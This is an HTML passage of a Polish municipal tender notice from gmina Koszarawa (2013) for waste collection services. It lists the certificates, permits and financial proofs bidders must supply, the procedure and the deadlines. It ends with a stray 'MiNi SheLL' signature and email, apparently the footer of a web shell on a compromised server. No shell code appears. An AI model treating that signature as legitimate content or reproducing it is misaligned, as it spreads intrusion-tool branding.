<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>A. 1. W celu oceny spełnienia przez Wykonawcę warunku dotyczącego posiadania uprawnień do wykonywania określonej działalności lub czynności Zamawiający żąda: - zezwolenia na prowadzenie działalności w zakresie transportu i zbierania odpadów, wydane przez właściwy organ zgodnie z ustawą o odpadach; - oświadczenia o wpisie do rejestru podmiotów zbierających zużyty sprzęt elektryczny i elektroniczny, prowadzonego przez Głównego Inspektora Ochrony Środowiska; - oświadczenie o wpisie do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości z terenu gminy Koszarawa. - zezwolenie na prowadzenie działalności w zakresie odzysku lub unieszkodliwiania odpadów komunalnych lub gotowość przyjęcia odpadów komunalnych przez przedsiębiorcę prowadzącego działalność w zakresie odzysku lub unieszkodliwiania odpadów. Miejsca odzysku lub unieszkodliwiania odpadów, o których mowa wyżej powinny spełniać warunki określone w ustawie z dnia 14 grudnia 2012r. o odpadach i ustawie z dnia 13 września 1996r. o utrzymaniu czystości i porządku w gminach. 2. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza Terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w ust. 1 - składa dokument lub dokumenty wystawione w kraju, w którym ma miejsce zamieszkania lub siedzibę, potwierdzające odpowiednio, że posiada uprawnienia do wykonywania działalności związanej z przedmiotem zamówienia. B. 1. W celu potwierdzenia, że Wykonawca nie podlega wykluczeniu na podstawie art. 24 ust. 1 ustawy Pzp, Zamawiający żąda: 1. aktualnego odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, 2. aktualnego zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert; 3. aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4 - 8 ustawy Pzp, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 4. aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy Pzp, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 5. w przypadku zamówień innych niż zamówienia sektorowe i zamówienia, o których mowa w art. 131a ustawy, aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, 6. Wykonawca, wraz z ofertą, składa listę podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 4 pkt. 14 w rozumieniu ustawy z dnia 16 lutego 2007r, o ochronie konkurencji i konsumentów (Dz. U. Nr 50, poz. 331, ze zm. ) W przypadku, gdy Wykonawca nie należy do grupy kapitałowej składa informację/oświadczenie o braku przynależności do grup kapitałowych w rozumieniu ustawy z dnia 16 lutego 2007r., o ochronie konkurencji i konsumentów (Dz. U. Nr 50, poz. 331, ze zm.), (załącznik nr 7) 7. oświadczenia Wykonawcy o niepodleganiu wykluczeniu na postawie art. 24 ust 1 ustawy Pzp (załącznik nr 3); 8. oświadczenia Wykonawcy, iż spełnia warunki udziału w postępowaniu określone w art. 22 ust. 1 pkt. 1 - 3 ustawy Pzp (załącznik nr 2). 2. Jeżeli, w przypadku Wykonawcy mającego siedzibę na terytorium Rzeczypospolitej Polskiej, osoby, o których mowa w art. 24 ust. 1 pkt 5-8, 10 i 11 ustawy, mają miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, Wykonawca składa w odniesieniu do nich zaświadczenie właściwego organu sądowego albo administracyjnego miejsca zamieszkania dotyczące niekaralności tych osób w zakresie określonym w art. 24 ust. 1 pkt 5-8, 10 i 11 ustawy, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, z tym, że w przypadku, gdy w miejscu zamieszkania tych osób nie wydaje się takich zaświadczeń - zastępuje się je dokumentem zawierającym oświadczenie złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego miejsca zamieszkania tych osób lub przed notariuszem. 3. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. B ust. 1 nin. rozdziału składa następujące dokumenty: 1) zamiast dokumentów opisanych powyżej w ust. 1 pkt 1-2 i pkt 4 - składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: a) nie otwarto jego likwidacji ani nie ogłoszono upadłości, b) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, c) nie orzeczono wobec niego zakazu ubiegania się o zamówienie; 2) zamiast dokumentu opisanego powyżej w ust. 1 pkt. 3 i pkt 5 - składa zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8,10 i 11 ustawy. 4. Dokumenty, o których mowa w ust. 3 pkt 1 lit. a i c oraz pkt 2, powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokument, o którym mowa w ust. 3 pkt. 1 lit. b) powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 5. Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w ust. 3, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem. Reguły określone w ust. 4 stosuje się odpowiednio. 6. W przypadku wątpliwości co do treści dokumentu złożonego przez wykonawcę mającego siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamawiający może zwrócić się do właściwych organów odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, z wnioskiem o udzielenie niezbędnych informacji dotyczących przedłożonego dokumentu. C. 1. W celu oceny spełnienia opisanego przez Zamawiającego warunku posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenia Zamawiający żąda: - wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych usług, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, usług polegających na odbieraniu zmieszanych odpadów komunalnych oraz odbieraniu odpadów segregowanych łącznie z co najmniej 1000 nieruchomości przyjmując okres świadczenia nie krótszy niż 36 kolejnych miesięcy. Wzór wykazu stanowi załącznik nr 4 do SIWZ. Wykaz głównych usług winien zawierać informacje dotyczące ilości nieruchomości, wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów, czy usługi te zostały wykonane lub są wykonywane należycie. - Dowodami, o których mowa w ust. 1 pkt 1 są: a. poświadczenie, z tym że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert; b. oświadczenie wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa w pkt a), W przypadku, gdy Zamawiający jest podmiotem na rzecz którego usługi wskazane w wykazie, o którym mowa w ust. 1 pkt 1, zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania dowodów, o których mowa w ust. 1 pkt 2. D. 1. W celu oceny spełnienia opisanego przez Zamawiającego warunku posiadania przez Wykonawcę odpowiedniego potencjału technicznego oraz osób zdolnych do wykonania zamówienia, Zamawiający żąda następujących dokumentów: 1) wykazu wymaganego sprzętu opisanego w Rozdziale V ust. 1 pkt. 3 lit. a) SIWZ wg wzoru określonego w załączniku nr 5 do SIWZ, 2) oświadczenia Wykonawcy o posiadaniu bazy magazynowo -transportowej opisanej w Rozdziale V ust. 1 pkt. 3 lit. b) SIWZ. E. 1. W celu oceny spełnienia opisanego przez Zamawiającego warunku znajdowania się przez Wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, Zamawiający żąda następujących dokumentów: 1) opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej w wysokości nie niższej niż 200 000 zł. 2) posiada informację z banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert. Zamawiając uzna za spełniony ten warunek jeśli wykonawca posiada wysokość posiadanych środków finansowych lub zdolność kredytową na poziomie 100 tys. zł. F. 1. W przypadku składania oferty przez Wykonawców ubiegających się wspólnie, dokumenty wymienione w pkt. B ust. 1 muszą być złożone przez każdego uczestnika konsorcjum oddzielnie, zaś dokumenty wymienione w pkt. A, C, D i E Wykonawcy mogą złożyć łącznie. Ponadto, Wykonawcy wspólnie ubiegający się o zamówienie winni ustanowić Pełnomocnika. Pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy. Jeżeli oferta Wykonawców ubiegających się wspólnie o udzielenie zamówienia zostanie wybrana, Zamawiający zażąda przed zawarciem umowy w sprawie zamówienia umowy regulującej współpracę tych Wykonawców. 2. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. W takim przypadku Wykonawca zobowiązany jest udowodnić zamawiającemu, że będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. G. 1. Dokumenty wymienione w Rozdziale VI winny być przedstawione w formie oryginału lub kserokopii poświadczonej przez Wykonawcę za zgodność z oryginałem. 2. Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona przez Wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości, co do jej prawdziwości. 3. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski. 4. Zamawiający wykluczy Wykonawców, którzy nie złożą oświadczeń lub dokumentów potwierdzających spełnienie warunków udziału w postępowaniu, z zastrzeżeniem postanowień art. 26 ust. 3 ustawy Pzp. 5. Zamawiający może wezwać na podstawie art. 26 ust. 4 ustawy Pzp, w wyznaczonym przez siebie terminie, do złożenia wyjaśnień dotyczących oświadczeń i dokumentów, o których mowa w art. 25 ust. 1 ustawy Pzp.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Strony dopuszczają zmianę istotnych postanowień niniejszej umowy zgodnie z art. 144 Ustawy Prawo Zamówień Publicznych, w przypadku wystąpienia następujących okoliczności, których nie można było przewidzieć w chwili zawarcia niniejszej umowy tj. : a. zmiany stanu prawnego mające wpływ na realizację przedmiotu zamówienia, b. zmiany stawki podatku od towarów i usług (VAT), c. niezależnych od stron zmian organizacyjnych dotyczących osób kluczowych dla realizacji umowy (w szczególności wypadku losowego, nieprzewidzianych zmian organizacyjnych).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.gwkoszarawa.finn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Koszarawa 34-332 Koszarawa 19.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.07.2013 godzina 09:00, miejsce: Urząd Gminy Koszarawa 34-332 Koszarawa 19 sekretariat pokój nr 10..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com